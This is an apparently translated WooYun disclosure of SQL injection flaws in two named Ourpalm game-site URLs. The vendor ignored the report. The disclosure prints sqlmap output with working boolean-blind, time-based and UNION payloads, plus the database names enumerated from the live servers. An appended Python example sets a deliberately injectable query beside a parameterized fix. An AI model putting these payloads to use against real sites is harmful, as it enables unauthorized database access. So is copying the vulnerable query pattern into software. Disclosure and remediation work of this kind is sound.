
Vulnerability summary

Defect ID: wooyun-2016-0170856

Title: Multiple SQL injection points across Ourpalm (掌趣) sites

Vendor: Beijing Ourpalm Technology Co., Ltd. (北京掌趣科技股份有限公司)

Author: mango

Submitted: 2016-01-18 15:30

Fixed: 2016-01-23 15:40

Published: 2016-01-23 15:40

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-01-18: details sent to the vendor, awaiting vendor handling
2016-01-23: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

2

Detailed description:

http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307

sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=1 AND 1104=1104&s=31&channel=A307
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] ssfee_platform
[*] test
Database: ssfee_platform
[519 tables]


Proof of vulnerability:

http://long.gamebean.com/game_enter.php?s_id=1

sqlmap identified the following injection points with a total of 217 HTTP(s) requests:
---
Parameter: s_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#
---
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [25]:
[*] aa
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws

Fix recommendation:
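Added example, not part of the original report: a Python/sqlite3 model of the two query shapes behind pdmodel_list.php (numeric model=) and game_enter.php (string s_id=). It places the string-concatenation pattern that the sqlmap findings imply beside an integer-validated, parameter-bound version, so the report's boolean-blind and UNION inputs can be seen to alter the first query and to be treated as plain data by the second. The table and column names are constructed; the real site runs PHP on MySQL, and the fix pattern is the same there (intval() plus PDO/mysqli prepared statements).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in schema; names are assumptions, not the site's.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE model_info(id INTEGER, model INTEGER, name TEXT);
        INSERT INTO model_info VALUES (1, 1, 'phone-a'), (2, 1, 'phone-b'),
                                      (3, 2, 'phone-c');
        CREATE TABLE game(s_id TEXT, title TEXT);
        INSERT INTO game VALUES ('1', 'game-one'), ('2', 'game-two');
    """)
    return conn


def vulnerable_model_list(conn: sqlite3.Connection, model: str) -> list:
    # Vulnerable pattern: the GET value is pasted into the SQL text, so the
    # report's boolean-blind input "1 AND 1104=1104" is parsed as SQL and
    # silently changes the WHERE clause instead of being rejected.
    sql = f"SELECT name FROM model_info WHERE model = {model}"
    return [row[0] for row in conn.execute(sql)]


def safe_model_list(conn: sqlite3.Connection, model: str) -> list:
    # Hardened: a numeric parameter is validated as a plain integer before
    # it is bound; any other input is refused before the query is built.
    if not model.isdigit():
        raise ValueError("model must be a non-negative integer")
    sql = "SELECT name FROM model_info WHERE model = ?"
    return [row[0] for row in conn.execute(sql, (int(model),))]


def safe_game_enter(conn: sqlite3.Connection, s_id: str) -> list:
    # Hardened string-context lookup: the value is bound as a parameter, so
    # the report's UNION input is compared literally and no SQL inside it runs.
    sql = "SELECT title FROM game WHERE s_id = ?"
    return [row[0] for row in conn.execute(sql, (s_id,))]
```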

Copyright notice: when reposting, please credit the source as mango@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-01-23 15:40

Vendor comment:

Vulnerability rank: 4 (WooYun rating)

Latest status:

None yet

